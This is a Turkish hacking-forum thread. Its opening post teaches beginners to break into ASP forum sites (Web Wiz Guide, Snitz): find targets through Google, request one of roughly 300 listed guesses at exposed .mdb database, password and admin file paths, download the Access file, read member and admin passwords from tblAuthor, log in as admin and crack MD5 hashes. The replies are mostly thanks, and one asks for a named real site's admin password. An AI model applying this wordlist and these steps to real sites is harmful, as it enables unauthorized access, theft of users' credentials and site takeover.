İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

asp hack

10-09-2006 02:53
#1
ifIwereyou - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2006
Nereden:
Denizli
Mesajlar:
205
Teşekkür (Etti):
0
Teşekkür (Aldı):
10
Konular:
31
Ticaret:
(0) %
Öncelikle selam...

Arkadaşlar şunu belitmeliyimki asp hack hakkında bir sürü döküman mevcut. Ancak benim bu dökümanı yazma sebebim bu konuda daha önceden bilgisi olan arkadaşların teknik terimler kullanarak anlatmaları. Şahsi kanaatimce Hack olayına yeni başlayanlar bi dökümanları incelediğinde çoğu zaman bi şey anlamamalarıdır....


Şimdi konumuza geçelim

Burada "ASP", "DATABASE", "MDB" gibi kavramların ne demek olduğunu elimden geldiğince açıklamaya çalışacağım.. Çünkü Hackerlık adına bu kavramları öğrenmeniz gayet önemlidir.


İlk olarak "ASP" dediğimiz şey nedir onu inceleyelim...

ASP, ya da Active Server Pages (Etkin Sunucu Sayfaları), Microsoft tarafından geliştirilen internete yönelik sunucu taraflı (serverside) çalışan programlama dillerinden birisidir. Sunucunun sadece durağan sayfaları istemciye (ziyaretçi) göndermesi yerine, ziyaretçiden veri kabul edilmesi gerekliliğinin sonucunda ortaya çıkmıştır.

Bir ASP dosyasının içinde ASP kodları bulunur, bu dosya istemci tarafından istendiğinde sunucu öncelikle ASP kodlarını icra ederek, istemciye göndereceği bilgiyi oluşturur ve gönderir. Gönderilen bilgi genellikle HTML (ya da SGML) şeklindedir. Fakat sadece bunlarla sınırlı değildir, aynı şekilde bir grafik dosyasıda oluşturulup, istemciye gönderilebilinir.

Şimdi gelelim "DATABASE" kavramına

Türkçe karşılığı "veritabı" olan "database" genellikle yüksek işlem gücü gerektiren aktif programlama dillerinde kullanılır.


Şimdi ise sıra "MDB" de

MDB ise Microsoft Acces Uygulamalı dosyaların resmi uzantısıdır.

Aklınıza şöyle bi soru gelebilir.
"Kardeşim ben web sitesinde Accesin ne işe yaradığını anlamadım. Nedir bu işin hikmeti?"

Site adminleri (admin=bir sitedeki en yetkili kişi) üyelerinin profillerini, şifrelerini, ve aklınıza gelebilecek her türlü bilgisini acces üzerinden saklar. Bu olayın Hackerları ilgilendiren kısmı ise bi Hacker admine ait olan bu MDB dosyalarını ele geçirdiğinde otomatikmen sitedeki üyelerin şifrelerine ve hatta adminin şifresine de ulaşabilir.

Gelgelelim ASP HACK NASIL YAPILIR?

Asp hack yapabilmeniz için çeşitli yollar vardır. Bunların en kullanılan yolu hiç bir program gerektirmeyen ve yeni başlayanlar için bi nevi deneme olması açısından Google üzerinden yapılanıdır. Asp Hack genellikle forum hizmeti sitelerde yapılmaktadır. Şu an dünya üzerinde en yaygın şekilde kullanılan forum uygulamaları "WEB WIZ GUIDE" ve "SNITZ FORUM" dur. Hack yöntemimiz ise her ***sinde hemen hemen aynı özellikler taşır.

Şimdi aklınızdan geçen bi başka soruya cevab verelim.

Diyeceksiniz ki ;
"Adminin elinde olan bu tür MDB dosyalarını nasıl ele geçirebiliriz?"

Cevaben,
Google a girip "Web Wiz Guide" kelimesini araştırıyoruz.. Tabi az sonra işin mantığını kavrayınca google da siz bu arama taktiklerini kendinize göre değiştirebilirsiniz. "Web Wiz Guide" kelimesini araştırdığımız zaman karşımıza bir sürü site adresleri çıkıyor. Bizi ilgilendiren siteler ise URL (URL= Site Adresi) sinde forum/default.asp olanlar ilgilendiriyor.

İçlerinden bi tanesini seçiyosunuz DİKKAT! = Sitenin adresinde /forum/default.asp olmasına dikkat ediniz.

Site açıldığı zaman ADRES ÇUBUĞUNDAKİ /forum/default.asp yazını silip

./db/main.mdb
./tools/snitz_forums_2000.mdb
./snitz_forums_2000.mdb
./admin/wwforum.mdb
./db/uyelik.mdb
./passwd.txt
./uyelik.mdb
./uyeler.mdb
./login.mdb
./enter.mdb
./giris.mdb
./sifreler.mdb
./member.mdb
./members.mdb
./samples.mdb
./wwforum.mdb
./genctr.mdb
./aforum.mdb
./forum.mdb
./private.mdb
./register.mdb
./.mdb
./db/snitz_forums_2000.mdb
./db/login.mdb
./db/forum.mdb
./db/genctr.mdb
./db/aforum.mdb
./db/enter.mdb
./db/giris.mdb
./db/forum.mdb
./db/uyelik.mdb
./db/uyeler.mdb
./db/private.mdb
./db/register.mdb
./db/.mdb
./db/sifreler.mdb
./db/member.mdb
./db/members.mdb
./db/samples.mdb
./db/wwforum.mdb
./db/tools/snitz_forums_2000.mdb
./admin/member.mdb
./admin/private.mdb
./admin/register.mdb
./admin/members.mdb
./admin/uyeler.mdb
./admin/sifreler.mdb
./admin/enter.mdb
./admin/giris.mdb
./admin/register.mdb
./admin/samples.mdb
./admin/private.mdb
./admin/mdb.mdb
./admin/forum.mdb
./admin/aforum.mdb
./admin/login.mdb
./admin/.mdb
./admin/database/wwforum.mdb
./admin/database/uyeler.mdb
./admin/database/sifreler.mdb
./admin/database/login.mdb
./admin/database/member.mdb
./admin/database/members.mdb
./admin/database/private.mdb
./admin/database/enter.mdb
./admin/database/giris.mdb
./admin/database/register.mdb
./admin/database/sevgi.mdb
./admin/database/samples.mdb
./admin/database/mbd.mdb
./admin/database/forum.mdb
./admin/database/aforum.mdb
./admin/database/.mdb
./admin/db/wwforum.mdb
./admin/db/uyeler.mdb
./admin/db/sifreler.mdb
./admin/db/login.mdb
./admin/db/member.mdb
./admin/db/members.mdb
./admin/db/private.mdb
./admin/db/register.mdb
./admin/db/enter.mdb
./admin/db/giris.mdb
./admin/db/samples.mdb
./admin/db/mdb.mdb
./admin/db/forum.mdb
./admin/db/aforum.mdb
./admin/db/.mdb
./skeetx/slog/login.mdb
./forum/db/main.mdb
./forum/tools/snitz_forums_2000.mdb
./forum/snitz_forums_2000.mdb
./forum/admin/wwforum.mdb
./forum/db/uyelik.mdb
./forum/passwd.txt
./forum/uyelik.mdb
./forum/uyeler.mdb
./forum/login.mdb
./forum/enter.mdb
./forum/giris.mdb
./forum/sifreler.mdb
./forum/member.mdb
./forum/members.mdb
./forum/samples.mdb
./forum/wwforum.mdb
./forum/genctr.mdb
./forum/private.mdb
./forum/register.mdb
./forum/aforum.mdb
./forum/forum.mdb
./forum/.mdb
./forum/db/snitz_forums_2000.mdb
./forum/db/login.mdb
./forum/db/forum.mdb
./forum/db/genctr.mdb
./forum/db/aforum.mdb
./forum/db/forum.mdb
./forum/db/enter.mdb
./forum/db/giris.mdb
./forum/db/uyelik.mdb
./forum/db/uyeler.mdb
./forum/db/private.mdb
./forum/db/register.mdb
./forum/db/.mdb
./forum/db/sifreler.mdb
./forum/db/member.mdb
./forum/db/members.mdb
./forum/db/samples.mdb
./forum/db/wwforum.mdb
./forum/db/tools/snitz_forums_2000.mdb
./forum/admin/member.mdb
./forum/admin/members.mdb
./forum/admin/uyeler.mdb
./forum/admin/sifreler.mdb
./forum/admin/enter.mdb
./forum/admin/giris.mdb
./forum/admin/register.mdb
./forum/admin/samples.mdb
./forum/admin/private.mdb
./forum/admin/mdb.mdb
./forum/admin/forum.mdb
./forum/admin/aforum.mdb
./forum/admin/login.mdb
./forum/admin/.mdb
./forum/admin/database/wwforum.mdb
./forum/admin/database/uyeler.mdb
./forum/admin/database/sifreler.mdb
./forum/admin/database/login.mdb
./forum/admin/database/member.mdb
./forum/admin/database/enter.mdb
./forum/admin/database/giris.mdb
./forum/admin/database/members.mdb
./forum/admin/database/private.mdb
./forum/admin/database/register.mdb
./forum/admin/database/sevgi.mdb
./forum/admin/database/samples.mdb
./forum/admin/database/mbd.mdb
./forum/admin/database/forum.mdb
./forum/admin/database/aforum.mdb
./forum/admin/database/.mdb
./forum/admin/db/wwforum.mdb
./forum/admin/db/uyeler.mdb
./forum/admin/db/sifreler.mdb
./forum/admin/db/login.mdb
./forum/admin/db/member.mdb
./forum/admin/db/members.mdb
./forum/admin/db/enter.mdb
./forum/admin/db/giris.mdb
./forum/admin/db/private.mdb
./forum/admin/db/register.mdb
./forum/admin/db/samples.mdb
./forum/admin/db/mdb.mdb
./forum/admin/db/forum.mdb
./forum/admin/db/aforum.mdb
./forum/admin/db/.mdb
./Zehir.asp
./upload.asp
./dbase.mdb
./admin/dbase.mdb
./forum/dbase.mdb
./fiyat.mdb
./fiyatlar.mdb
./fiyat
./fiyatlar
./member/admin
./members/admin
./member/admin.asp
./members/admin.asp
./form/admin.asp
./form
./maillist
./mailman/admin
./toplist/admin
./db
./veri
./vrt
./veriyolu
./uyelik
./yonetici
./yonetim
./konsol
./kpanel
./kontrolpanel
./kontrolpaneli
./data1
./vt
./admin
./administer
./administered
./administering
./administers
./administration
./administrations
./administrative
./administratively
./administrator
./administrators
./data
./databank
./databanks
./database
./databases
./passport
./passports
./password
./passwords
./admin.php
./data.mdb
./veri.mdb
./uyelik.mdb
./main.mdb
./user.mdb
./users.mdb
./forum.mdb
./yonetici.mdb
./database.mdb
./admin.mdb
./mail.mdb
./maillist.mdb
./login.mdb
./data1.mdb
./mesajbox.mdb
./message.mdb
./messagebox.mdb
./webmail.mdb
./vt.mdb
./kontrol.asp
./kontrolpanel.asp
./admin.asp
./administer.asp
./administered.asp
./administering.asp
./administers.asp
./administration.asp
./administrations.asp
./administrative.asp
./administratively.asp
./administrator.asp
./administrators.asp
./portal.mdb
./uyeler.mdb
./yonetici.asp
./admin.txt
./adminpassword.txt
./pass.txt
./ftp.txt
./ftppassword.txt
./ftppass.txt
./password.txt
./passwords.txt
./admin/forum/database/wwforum.mdb
./admin/forum/database/uyeler.mdb
./admin/forum/database/sifreler.mdb
./admin/forum/database/login.mdb
./admin/forum/database/member.mdb
./admin/forum/database/members.mdb
./admin/forum/database/private.mdb
./admin/forum/database/enter.mdb
./admin/forum/database/giris.mdb
./admin/forum/database/register.mdb
./admin/forum/database/sevgi.mdb
./admin/forum/database/samples.mdb
./admin/forum/database/mbd.mdb
./admin/forum/database/forum.mdb
./admin/forum/database/aforum.mdb
./admin/forum/database/.mdb
./admin/forum/db/wwforum.mdb

Site adresi istediğimiz şekle geldikten sonra Enter lıyoruz ve karşımıza herhangi bi program ve ya dosya indirrken karşımıza çıkan pencere çıkıyor. Sanırım biraz da olsa aklınız da şekillenmiştir. Hızlı bi şekilde davranıp "KAYDET" seçeneğini tıklıyoruz ve o çok istediğimiz Adminin, içinde bütün üyelerin şifresi vs.. bulunan Acces dosyasını bilgisayarımıza indiriyoruz.

İndirme işi bittikten sonra dosyayı açıyoruz. Kimi zaman dosyayı açıp açmama konusunda emin olup olmadığmızı sorabilir. Siz hiç onun uyarılarını takmadan işinize devam ediyorsunuz. Acces dosyasını açtığınız zaman " tblAuthor " yazan rapora tıklıyoruz veee işte karşınız da Adminde dahil olmak üzere bütün herkesin şifrelerinden tutunda mail adreslerine kadar herşey

Artık bu işten sonrası kolay adminin Kullanıcı Adı ve Şifresi her zaman için birinci sıradaki dir. Sonrada sırayla üyelerin Id (Id = Identity = Kimlik = Üye Adı. Örneğin benimki "magnes") leridir. Adminin Kullanıcı adını ve şifresi ni aldıktan sonra siteye "LOGIN" yaparsınız ve o sitenin admini olarak siteye bağlanmış olursunuz. Az öncede dediğim gibi Admin sitedeki en yetkili kişidir. Site üzerinde istediği herşeyi yapabilcek birisidir. ANCAK önemli bi nokta vardır ki günümüzde bu tür sitelerde adminler çoğaltılarak ve hatta abartılarak her sayfaya ayrı bi adminin bakması öngörülmüştür ki bizim yaptığımız gibi herhangi bi hacker sitenin database sine ulaştığı zaman sadece o sayfadaki bilgilere ulaşabilsin diye. Herneyse siteye girdiğiniz zaman sağınız da ve solunuzda tıklanmayı bekleyen linkler varsa anlayın ki sitenin tümüne hakimsiniz. Ancak yoksa sadece forum sayfaları üzerinde istediklerinizi yapabilirisiniz. Siteye admin olarak bağlandıktan sonra sitenin akıbeti size kalmış istediğiz gibi şekillendirin.

Ayrıca başka bi noktaya daha değinmek isterim. Buda " tblAuthor " dosyasını açtığınız zaman birinci sıradaki (yani adminin) PASSWORD kısmında baktınız ki 40-45 hanelik bi sayı topluluğu var. Bu demektir ki işiniz biraz uzayacak. Bunun anlamı ise Hackerlara karşı Adminin almış olduğu bir önlem. O elinizde bulunan sayılar tahmin ettiğiniz gibi adminin şifresi değildir. Admin olabilcek herhangi bir saldırıya karşı şifresini anlaşılmasın diye bilmem kaç bitlik verilere dönüştürülmüş halini o dosyaya kaydetmiştir.

Bu durum da ise "MD5 CRACKER" adında bir program sayesinde o sayı topluluğunuz orjinal haline çevirebilirisiniz. Bu iş kimi zaman saatler sürebilir ancak sonuçtan kesin emin olabilirisiniz.

Bu programı ise google da arayarak bulabilirsiniz.


Kullanıcı İmzası
BİR GÜNDE KRAL OLMADIK BİR GÜNDE TAHTTAN İNMEYİZ...!
Konu ifIwereyou tarafından (10-09-2006 03:00 Saat 03:00 ) değiştirilmiştir.

10-09-2006 18:13
#2
FRİZGE - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Mesajlar:
23
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
0
Ticaret:
(0) %
:@:@:@:@:@
Kullanıcı İmzası
Her Yazıya Yorum Yapalım:inv
26-11-2006 23:12
#3
mitNİCK - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2006
Mesajlar:
13
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
tşk.ederim!
28-11-2006 12:51
#4
k@bus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2006
Nereden:
SiNoP
Mesajlar:
33
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
3
Ticaret:
(0) %
sanki önceden verilmişti bu ama neyse yinede saol ...
25-02-2011 22:29
#5
zerci - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Mesajlar:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
tşkler
26-02-2011 00:00
#6
The Sniper - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Mesajlar:
11
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
6
Ticaret:
(0) %
teþekkürler
26-02-2011 00:32
#7
cLy - ait Kullanıcı Resmi (Avatar)
cLy
Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2011
Nereden:
İstanbul
Mesajlar:
78
Teşekkür (Etti):
9
Teşekkür (Aldı):
44
Konular:
8
Ticaret:
(0) %
Teşekkürler !
ExoRcisTTT Teşekkür etti.
26-02-2011 12:59
#8
outlaw36 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Mesajlar:
2
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
ben nedense dediğiniz bilgilere ulaşamıyorum bana www.turktshirt.com admin şifresi lazım her yolu denedim olmadı.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı